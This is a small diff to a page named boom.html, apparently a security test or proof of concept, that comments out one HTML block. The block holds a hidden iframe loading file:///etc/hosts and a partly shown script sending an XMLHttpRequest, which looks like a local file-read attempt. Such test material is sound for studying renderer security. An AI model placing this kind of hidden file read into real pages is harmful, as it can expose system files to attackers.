--- a/boom.html
+++ b/boom.html
@@ -5,7 +5,7 @@
   style="border:1px solid black;">
 </iframe>
 
-<!DOCTYPE html>
+<!-- <!DOCTYPE html>
 <body>
   <iframe src="file:///etc/hosts" style="display:none"></iframe>
   <script>
@@ -22,7 +22,7 @@
     xhr.send();
   </script>
 </body>
-</html>
+</html> -->
 
 <!DOCTYPE html>
 <body>
